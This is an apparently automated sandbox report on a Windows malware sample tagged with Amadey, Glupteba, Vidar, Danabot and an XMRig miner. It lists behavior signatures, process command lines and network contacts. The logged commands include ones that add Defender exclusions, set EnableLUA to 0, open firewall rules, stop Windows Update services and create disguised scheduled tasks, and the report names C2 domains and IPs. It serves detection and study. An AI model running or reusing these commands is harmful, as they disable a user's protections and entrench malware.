Malware Analysis Report

2025-01-02 09:02

Sample ID 231005-ke5l4ahf6v
Target file
SHA256 7cd7bf6e8ec89fecb6efbad8f40556bd1e2433b58864cec67c216bbd0bacee74
Tags
amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

7cd7bf6e8ec89fecb6efbad8f40556bd1e2433b58864cec67c216bbd0bacee74

Threat Level: Known bad

The file file was found to be: Known bad.

Malicious Activity Summary

amadey danabot fabookie glupteba vidar 4841d6b1839c4fa7c20ecc420b82b347 banker dropper evasion loader spyware stealer trojan upx xmrig discovery miner persistence

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

xmrig

Glupteba payload

Windows security bypass

Vidar

Detect Fabookie payload

Danabot

Fabookie

Glupteba

UAC bypass

XMRig Miner payload

Drops file in Drivers directory

Downloads MZ/PE file

Stops running service(s)

Modifies Windows Firewall

Executes dropped EXE

Reads user/profile data of web browsers

.NET Reactor proctector

Drops startup file

Windows security modification

UPX packed file

Loads dropped DLL

Checks computer location settings

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Checks installed software on the system

Adds Run key to start application

Checks whether UAC is enabled

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Drops file in Program Files directory

Enumerates physical storage devices

Program crash

System policy modification

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Checks processor information in registry

Suspicious behavior: EnumeratesProcesses

Kills process with taskkill

Creates scheduled task(s)

Modifies system certificate store

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-05 08:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-05 08:31

Reported

2023-10-05 08:34

Platform

win7-20230831-en

Max time kernel

10s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\file.exe"

Signatures

Amadey

trojan amadey

Danabot

trojan banker danabot

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Vidar

stealer vidar

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

.NET Reactor proctector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\q9ecG5Jiu97qnIUp7o9WTCJj.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\B8CVO7aSC3mrHkzVNqTgC7IW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4T1iwVNIMtRLpJvazjYQB2wf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkV1L7YSDkPd1qLEbbdLvHRg.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\l5OiBVWFni3wDQgUDHe62X67.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\7hfei201LExqEGNOQaWMSudw.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\uPwOhD5iuzwpeA8mmGSKWXH4.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2476 set thread context of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A
N/A N/A C:\Windows\System32\schtasks.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2476 wrote to memory of 2408 N/A C:\Users\Admin\AppData\Local\Temp\file.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 1540 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 2408 wrote to memory of 524 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 1540 wrote to memory of 1880 N/A C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 2156 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 2408 wrote to memory of 3020 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 1880 wrote to memory of 2252 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe
PID 2408 wrote to memory of 1748 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\file.exe

"C:\Users\Admin\AppData\Local\Temp\file.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\file.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe

"C:\Users\Admin\Pictures\zoJnsmhEzpohaSvU280MKqcZ.exe"

C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe

"C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe"

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

"C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe"

C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

"C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe"

C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe

"C:\Users\Admin\Pictures\nm1szDYHmcoWcNJ7bYzDGwax.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nhdues.exe /TR "C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe" /F

C:\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe

"C:\Users\Admin\Pictures\y0hzJjQsjwag2SqAwxiJtj21.exe"

C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe

"C:\Users\Admin\Pictures\IP3UlzLvRJTW2rqHaDNZ1jeD.exe" --silent --allusers=0

C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe

"C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nhdues.exe" /P "Admin:N"&&CACLS "nhdues.exe" /P "Admin:R" /E&&echo Y|CACLS "..\1ff8bec27e" /P "Admin:N"&&CACLS "..\1ff8bec27e" /P "Admin:R" /E&&Exit

C:\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe

"C:\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe"

C:\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe

"C:\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe"

C:\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp

"C:\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp" /SL5="$C011E,491750,408064,C:\Users\Admin\Pictures\YWjpdLRkE9QOyniJrKs0TD5A.exe"

C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

"C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe"

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "nhdues.exe" /P "Admin:N"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\1ff8bec27e" /P "Admin:R" /E

C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

"C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe" /S /UID=lylal220

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

"C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe"

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe

dw20.exe -x -s 384

C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe

"C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

"C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp" /SL5="$201CE,833775,56832,C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe" /VERYSILENT

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start https://iplogger.com/1ciGA4

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231005083231.log C:\Windows\Logs\CBS\CbsPersist_20231005083231.cab

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\7056299293.exe"

C:\Users\Admin\AppData\Local\Temp\7056299293.exe

"C:\Users\Admin\AppData\Local\Temp\7056299293.exe"

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "CmyyXOQjKrcAhRRx5JqyGuiN.exe" /f

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "CmyyXOQjKrcAhRRx5JqyGuiN.exe" /f & erase "C:\Users\Admin\Pictures\CmyyXOQjKrcAhRRx5JqyGuiN.exe" & exit

C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe

"C:\Users\Admin\Pictures\XtVYtkgxBzRxuXzi7NG5JRFw.exe"

C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

"C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll, Main

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\system32\taskeng.exe

taskeng.exe {88F3D40F-6C75-495F-B96D-BFA86ADDBEB9} S-1-5-21-3513876443-2771975297-1923446376-1000:GPFFWLPI\Admin:Interactive:[1]

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\system32\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll, Main

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\syswow64\rundll32.exe

"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61 C:\Users\Admin\AppData\Local\Temp\7056299293.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
DE 148.251.234.93:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 flyawayaero.net udp
US 8.8.8.8:53 ji.fhauiehgha.com udp
US 8.8.8.8:53 downloads.digitalpulsedata.com udp
US 8.8.8.8:53 jetpackdelivery.net udp
RU 5.42.64.10:80 5.42.64.10 tcp
US 85.217.144.143:80 85.217.144.143 tcp
US 8.8.8.8:53 bolidare.beget.tech udp
US 8.8.8.8:53 lycheepanel.info udp
US 104.21.93.225:443 flyawayaero.net tcp
US 8.8.8.8:53 goboh2b.top udp
US 188.114.97.0:443 jetpackdelivery.net tcp
US 104.21.32.208:443 lycheepanel.info tcp
US 8.8.8.8:53 net.geo.opera.com udp
US 85.217.144.143:80 85.217.144.143 tcp
NL 13.227.219.83:443 downloads.digitalpulsedata.com tcp
US 8.8.8.8:53 link.storjshare.io udp
NL 185.26.182.111:80 net.geo.opera.com tcp
US 136.0.77.2:443 link.storjshare.io tcp
RU 91.106.207.50:80 bolidare.beget.tech tcp
NL 185.26.182.111:443 net.geo.opera.com tcp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 potatogoose.com udp
NL 88.221.25.153:80 apps.identrust.com tcp
NL 88.221.25.153:80 apps.identrust.com tcp
US 172.67.180.173:443 potatogoose.com tcp
HK 103.100.211.218:80 ji.fhauiehgha.com tcp
RU 212.193.49.228:80 goboh2b.top tcp
US 8.8.8.8:53 justsafepay.com udp
US 188.114.97.0:443 justsafepay.com tcp
US 8.8.8.8:53 iplogger.org udp
DE 148.251.234.83:443 iplogger.org tcp
US 8.8.8.8:53 z.nnnaajjjgc.com udp
US 136.0.77.2:80 link.storjshare.io tcp
BG 193.42.32.29:80 193.42.32.29 tcp
